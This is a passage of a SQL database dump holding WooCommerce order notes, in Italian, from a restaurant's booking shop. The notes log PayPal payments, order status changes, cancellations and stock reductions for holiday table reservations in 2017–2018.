lavorazione.',0,'1','WooCommerce','order_note',0,0),(548,580,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-27 17:18:08','2017-12-27 16:18:08','Magazzino dell\'elemento Prenotazione Tavolo per 4 Persone - Capodanno 2018 (tavolox4) ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(549,573,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-28 09:20:53','2017-12-28 08:20:53','Pagamento refunded tramite IPN. Lo stato dell\'ordine è cambiato da In lavorazione a Rimborsato.',0,'1','WooCommerce','order_note',0,0),(550,582,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-29 11:26:32','2017-12-29 10:26:32','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(551,582,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-29 11:26:34','2017-12-29 10:26:34','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(552,582,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-29 11:26:34','2017-12-29 10:26:34','Magazzino dell\'elemento Prenotazione Tavolo per 6 Persone - Capodanno 2018 (tavolox6) ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(553,583,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-30 11:59:23','2017-12-30 10:59:23','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(554,583,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-30 11:59:26','2017-12-30 10:59:26','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(555,583,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-30 11:59:26','2017-12-30 10:59:26','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Capodanno 2018 (tavolox2) ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(556,585,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-01-11 21:57:31','2018-01-11 20:57:31','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(557,585,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-01-11 21:57:35','2018-01-11 20:57:35','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(558,584,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-01-11 22:36:59','2018-01-11 21:36:59','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(559,594,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-01-27 20:23:29','2018-01-27 19:23:29','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(560,594,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-01-27 20:23:30','2018-01-27 19:23:30','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(561,594,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-01-27 20:23:30','2018-01-27 19:23:30','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone San Valentino (#288) ridotto da 20 a 19.',0,'1','WooCommerce','order_note',0,0),(562,595,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-01-29 15:01:40','2018-01-29 14:01:40','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(563,595,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-01-29 15:01:42','2018-01-29 14:01:42','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(564,595,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-01-29 15:01:42','2018-01-29 14:01:42','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone San Valentino (#288) ridotto da 19 a 18.',0,'1','WooCommerce','order_note',0,0),(566,596,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-03 23:16:45','2018-02-03 22:16:45','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(567,597,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-04 18:37:05','2018-02-04 17:37:05','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(568,597,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-04 18:37:09','2018-02-04 17:37:09','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(569,597,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-04 18:37:09','2018-02-04 17:37:09','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone San Valentino (#288) ridotto da 18 a 17.',0,'1','WooCommerce','order_note',0,0),(570,598,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-06 19:58:50','2018-02-06 18:58:50','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(571,599,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-08 15:03:31','2018-02-08 14:03:31','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(572,599,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-08 15:03:33','2018-02-08 14:03:33','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(573,599,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-08 15:03:33','2018-02-08 14:03:33','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone San Valentino (#288) ridotto da 17 a 16.',0,'1','WooCommerce','order_note',0,0),(574,600,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-11 19:41:32','2018-02-11 18:41:32','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(575,600,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-11 19:41:33','2018-02-11 18:41:33','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(576,600,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-11 19:41:33','2018-02-11 18:41:33','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone San Valentino (#288) ridotto da 16 a 15.',0,'1','WooCommerce','order_note',0,0),(577,601,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-11 21:35:48','2018-02-11 20:35:48','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(578,601,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-11 21:35:52','2018-02-11 20:35:52','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(579,601,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-11 21:35:52','2018-02-11 20:35:52','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone San Valentino (#288) ridotto da 15 a 14.',0,'1','WooCommerce','order_note',0,0),(580,602,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-12 17:15:12','2018-02-12 16:15:12','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(581,602,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-12 17:15:13','2018-02-12 16:15:13','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(582,602,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-12 17:15:13','2018-02-12 16:15:13','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone San Valentino (#288) ridotto da 14 a 13.',0,'1','WooCommerce','order_note',0,0),(583,604,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-12 18:19:24','2018-02-12 17:19:24','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(584,604,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-12 18:19:26','2018-02-12 17:19:26','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(585,604,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-12 18:19:26','2018-02-12 17:19:26','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone San Valentino (#288) ridotto da 13 a 12.',0,'1','WooCommerce','order_note',0,0),(586,605,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-12 18:52:09','2018-02-12 17:52:09','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(587,605,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-12 18:52:11','2018-02-12 17:52:11','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(588,605,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-12 18:52:11','2018-02-12 17:52:11','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone San Valentino (#288) ridotto da 12 a 11.',0,'1','WooCommerce','order_note',0,0),(589,606,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-12 19:19:55','2018-02-12 18:19:55','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(590,606,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-12 19:19:57','2018-02-12 18:19:57','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(591,606,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-12 19:19:57','2018-02-12 18:19:57','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone San Valentino (#288) ridotto da 11 a 10.',0,'1','WooCommerce','order_note',0,0),(592,607,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-12 21:27:47','2018-02-12 20:27:47','Ordine cancellato dal cliente. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(593,608,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-12 21:30:29','2018-02-12 20:30:29','Ordine cancellato dal cliente. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(594,609,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-12 21:36:18','2018-02-12 20:36:18','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(595,609,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-12 21:36:19','2018-02-12 20:36:19','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(596,609,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-12 21:36:19','2018-02-12 20:36:19','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone San Valentino (#288) ridotto da 10 a 9.',0,'1','WooCommerce','order_note',0,0),(597,610,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-13 11:13:24','2018-02-13 10:13:24','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(598,610,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-13 11:13:25','2018-02-13 10:13:25','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(599,610,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-13 11:13:25','2018-02-13 10:13:25','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone San Valentino (#288) ridotto da 9 a 8.',0,'1','WooCommerce','order_note',0,0),(600,611,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-13 18:49:47','2018-02-13 17:49:47','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(601,611,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-13 18:49:49','2018-02-13 17:49:49','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(602,611,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-13 18:49:49','2018-02-13 17:49:49','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone San Valentino (#288) ridotto da 8 a 7.',0,'1','WooCommerce','order_note',0,0),(603,613,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-13 19:37:05','2018-02-13 18:37:05','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(604,613,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-13 19:37:07','2018-02-13 18:37:07','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(605,613,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-13 19:37:07','2018-02-13 18:37:07','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone San Valentino (#288) ridotto da 7 a 6.',0,'1','WooCommerce','order_note',0,0),(606,612,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-13 20:33:00','2018-02-13 19:33:00','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(607,614,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-14 14:25:28','2018-02-14 13:25:28','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(608,614,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-14 14:25:29','2018-02-14 13:25:29','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(609,614,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-14 14:25:29','2018-02-14 13:25:29','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone San Valentino (#288) ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(610,615,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-14 16:07:38','2018-02-14 15:07:38','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(611,615,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-14 16:07:41','2018-02-14 15:07:41','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(612,615,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-14 16:07:41','2018-02-14 15:07:41','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone San Valentino (#288) ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(613,616,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-19 21:41:59','2018-02-19 20:41:59','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(614,616,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-02-19 21:42:02','2018-02-19 20:42:02','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(616,634,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-10 12:36:24','2018-03-10 11:36:24','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(617,638,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-10 12:40:14','2018-03-10 11:40:14','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(618,638,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-10 12:40:17','2018-03-10 11:40:17','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(619,638,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-10 12:40:17','2018-03-10 11:40:17','Magazzino dell\'elemento Prenotazione Tavolo per 4 Persone - Pasqua (pasqua-4pax) ridotto da 5 a 4.',0,'1','WooCommerce','order_note',0,0),(620,638,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-10 12:40:17','2018-03-10 11:40:17','Magazzino dell\'elemento Prenotazione Tavolo per 4 Persone - Pasquetta (pasquetta-4pax) ridotto da 4 a 3.',0,'1','WooCommerce','order_note',0,0),(621,635,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-10 13:29:22','2018-03-10 12:29:22','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(622,636,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-10 13:29:22','2018-03-10 12:29:22','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(623,637,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-10 13:29:22','2018-03-10 12:29:22','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(624,639,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-10 13:29:22','2018-03-10 12:29:22','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(625,640,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-10 13:46:45','2018-03-10 12:46:45','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(626,640,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-10 13:46:47','2018-03-10 12:46:47','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(627,640,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-10 13:46:47','2018-03-10 12:46:47','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Pasquetta (pasquetta-2pax) ridotto da 4 a 3.',0,'1','WooCommerce','order_note',0,0),(628,641,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-12 14:54:59','2018-03-12 13:54:59','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(629,641,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-12 14:55:03','2018-03-12 13:55:03','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(630,641,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-12 14:55:03','2018-03-12 13:55:03','Magazzino dell\'elemento Prenotazione Tavolo per 6 Persone - Pasqua (pasqua-6pax) ridotto da 3 a 2.',0,'1','WooCommerce','order_note',0,0),(631,643,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-13 10:51:52','2018-03-13 09:51:52','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(632,643,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-13 10:51:54','2018-03-13 09:51:54','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(633,643,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-13 10:51:54','2018-03-13 09:51:54','Magazzino dell\'elemento Prenotazione Tavolo per 6 Persone - Pasqua (pasqua-6pax) ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(634,647,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-14 17:27:19','2018-03-14 16:27:19','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(635,648,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-16 14:04:17','2018-03-16 13:04:17','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(636,648,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-16 14:04:18','2018-03-16 13:04:18','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(637,648,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-16 14:04:18','2018-03-16 13:04:18','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Pasquetta (pasquetta-2pax) ridotto da 3 a 2.',0,'1','WooCommerce','order_note',0,0),(638,649,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-16 21:23:01','2018-03-16 20:23:01','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(640,650,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-18 19:08:31','2018-03-18 18:08:31','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(641,650,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-18 19:08:33','2018-03-18 18:08:33','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(642,650,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-18 19:08:33','2018-03-18 18:08:33','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Pasqua (pasqua-2pax) ridotto da 4 a 3.',0,'1','WooCommerce','order_note',0,0),(643,651,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-18 19:45:47','2018-03-18 18:45:47','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(644,651,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-18 19:45:49','2018-03-18 18:45:49','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(645,651,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-18 19:45:49','2018-03-18 18:45:49','Magazzino dell\'elemento Prenotazione Tavolo per 6 Persone - Pasqua (pasqua-6pax) ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(646,652,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-20 15:20:53','2018-03-20 14:20:53','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(647,652,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-20 15:20:57','2018-03-20 14:20:57','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(648,652,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-20 15:22:53','2018-03-20 14:22:53','Lo stato dell\'ordine è cambiato da In lavorazione a Completato.',0,'1','WooCommerce','order_note',0,0),(649,655,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-21 20:19:14','2018-03-21 19:19:14','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(650,655,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-21 20:19:15','2018-03-21 19:19:15','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(651,655,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-21 20:19:15','2018-03-21 19:19:15','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Pasqua (pasqua-2pax) ridotto da 3 a 2.',0,'1','WooCommerce','order_note',0,0),(652,656,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-23 17:37:43','2018-03-23 16:37:43','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(653,656,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-23 17:37:45','2018-03-23 16:37:45','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(654,656,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-23 17:37:45','2018-03-23 16:37:45','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Pasqua (pasqua-2pax) ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(655,657,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-23 20:29:47','2018-03-23 19:29:47','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(656,657,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-23 20:29:50','2018-03-23 19:29:50','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(657,657,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-23 20:29:50','2018-03-23 19:29:50','Magazzino dell\'elemento Prenotazione Tavolo per 6 Persone - Pasquetta (pasquetta-6pax) ridotto da 3 a 2.',0,'1','WooCommerce','order_note',0,0),(658,658,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-23 22:25:06','2018-03-23 21:25:06','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(659,658,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-23 22:25:08','2018-03-23 21:25:08','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(660,658,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-23 22:25:08','2018-03-23 21:25:08','Magazzino dell\'elemento Prenotazione Tavolo per 4 Persone - Pasqua (pasqua-4pax) ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(661,659,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-24 09:33:44','2018-03-24 08:33:44','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(662,659,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-24 09:33:49','2018-03-24 08:33:49','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(663,659,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-24 09:34:02','2018-03-24 08:34:02','Lo stato dell\'ordine è cambiato da In lavorazione a Completato.',0,'1','WooCommerce','order_note',0,0),(664,661,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-24 13:14:46','2018-03-24 12:14:46','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(665,662,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-24 13:14:46','2018-03-24 12:14:46','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(667,663,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-24 17:00:40','2018-03-24 16:00:40','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(668,663,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-24 17:00:44','2018-03-24 16:00:44','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(669,663,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-24 17:00:44','2018-03-24 16:00:44','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Pasqua (pasqua-2pax) ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(670,664,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-24 20:23:41','2018-03-24 19:23:41','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(671,664,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-24 20:23:42','2018-03-24 19:23:42','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(672,664,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-24 20:23:42','2018-03-24 19:23:42','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Pasquetta (pasquetta-2pax) ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(673,665,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-24 20:31:00','2018-03-24 19:31:00','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(674,665,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-24 20:31:02','2018-03-24 19:31:02','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(675,665,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-24 20:31:02','2018-03-24 19:31:02','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Pasquetta (pasquetta-2pax) ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(676,666,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-25 15:27:51','2018-03-25 13:27:51','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(677,666,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-25 15:27:52','2018-03-25 13:27:52','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(678,666,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-25 15:27:52','2018-03-25 13:27:52','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Pasquetta (pasquetta-2pax) ridotto da 3 a 2.',0,'1','WooCommerce','order_note',0,0),(679,667,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-26 17:13:01','2018-03-26 15:13:01','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(680,667,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-26 